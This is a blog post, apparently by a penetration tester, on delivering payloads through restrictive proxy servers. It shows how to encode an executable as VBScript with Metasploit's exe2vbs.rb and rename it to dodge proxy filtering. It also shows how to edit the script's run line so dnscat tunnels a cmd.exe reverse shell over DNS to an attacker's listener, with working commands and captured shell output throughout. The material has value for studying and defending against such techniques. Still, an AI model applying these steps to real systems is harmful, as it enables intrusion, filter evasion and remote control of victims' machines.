A little while back I posted my Download and Execute Script shellcode and mentioned that it could be used in bypassing restrictive proxy servers. In this post I will give some quick examples of how you can actually do that.
The example scenarios I will describe are as follows, and involve having the script that is downloaded and executed:
- write an arbitrary executable to disk and run it, or
- open a reverse_http shell back through the restrictive proxy to the attackers system
Write an Executable to Disk and Run It
This scenario simply involves creating a vbscript file that contains an encoded copy of your chosen executable, that when run will decode the file, write it to disk, and then run it. The end result of this is exactly the same as with regular download and execute shellcode, however unlike with regular download and execute shellcode this method will get past restrictive proxy servers that block files with executable content (you just need to make sure that the proxy server isn't also going to block pages with any of the script commands you have used, and if it does - obfuscate!).
I was all set to write up a little program to automate this process of encoding an executable into a VBScript file, but then I stumbled onto the fact that a script to do this already exists - in Metasploit!
The script is called exe2vbs.rb and it sits inside the tools directory in the Metasploit 3 install directory. Assuming your Metasploit3 install directory is /opt/metasploit3/ run it like so:
[email protected]:~$ /opt/metasploit3/msf3/tools/exe2vbs.rb
Usage: /opt/metasploit3/msf3/tools/exe2vbs.rb [exe] [vbs]
So as an example, if you want to encode your executable trojan.exe into a vbscript trojan.vbs, use the following command line
[email protected]:~$ /opt/metasploit3/msf3/tools/exe2vbs.rb trojan.exe trojan.vbs
[*] Converted 282624 bytes of EXE into a vbs script
You now have a VB Script file that you can host on a webserver, which when run will write your encoded executable to disk and execute it. Just rename the extension of the file to something innocuous like .tmp to bypass proxy filename filtering, stick the script file on a webserver, and create an exploit using the Download and Execute Script shellcode as demonstrated in the Usage Examples section of this post.
What type of executables should you download onto the target system, supposing you actually want to do something useful on the target system and given that the system exists within a restrictive environment? Well, one potential tool is Dnscat, which can allow you to tunnel a shell out of the network via DNS, a protocol which is likely to be allowed to communicate externally even in some restrictive environments.
Running Dnscat to tunnel a shell out of a system does require some command line options to be used with the executable, however this is not a problem because you can add any necessary command line options to the executable bound into your script file by modifying the "run" line in the script file. Lets look at an example:
Download the Windows version of Dnscat and encode like so:
[email protected]:~/Downloads/nbtool/nbtool-0.04$ /opt/metasploit3/msf3/tools/exe2vbs.rb dnscat.exe dnscat.vbs
[*] Converted 121344 bytes of EXE into a vbs script
Then in the output vbs file look for a line similar to the following. Your line will likely look a little different because the variable names are being randomised by the exe2vbs.rb script, but just keep your eye out for ".run" appearing at the end of the first word in a line near the end of the file.
cgbKynYWc.run CDWPYlgAnS, 0, true
Then modify this line to look like the following, replacing subdomain.example.com
cgbKynYWc.run CDWPYlgAnS & " --domain subdomain.example.com
--exec ""cmd.exe""", 0, true
Essentially I have just added the following text to the line just before the first comma, these are the command line parameters that will be fed to the dsncat executable when it is run by the script:
& " --domain subdomain.example.com
Once that is done execute the script on your victim machine using an exploit, and if you are running a dnscat listener on your attacking machine ('dnscat --listen' as root) when the script runs you will receive a shell back via DNS:
[email protected]:~$ sudo dnscat --listen
Waiting for DNS requests for domain '*' on 0.0.0.0:53...
Timeout has occurred, resetting state
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
Please note that this DNS shell tunneling method requires that your system be acting as the authorative name server for your chosen domain, AND it doesn't work in all environments (it certainly won't work when split DNS is implemented, but in some other cases it won't work either). Read the dnscat wiki entry and this guide on DNS tunneling to learn more. If you want to test this locally without having a nameserver for your own domain, add the "--dns 192.168.56.1" switch to the modified run command in your script, where 192.168.56.1 should be replaced with the IP address (don't use a DNS name) of your attacking system.
Note that directly specifying the IP address of your attacking system like this won't work in (properly configured) restrictive environments - direct client connections to external DNS servers should not be permitted and all DNS queries should be sent through the environments configured DNS server, in which case they will only reach your attacking system if its acting as an authorative name server for the chosen domain.
The next entry in this series will cover how to tunnel out a shell via the restrictive proxy itself, using some slightly modified Metasploit reverse_http code.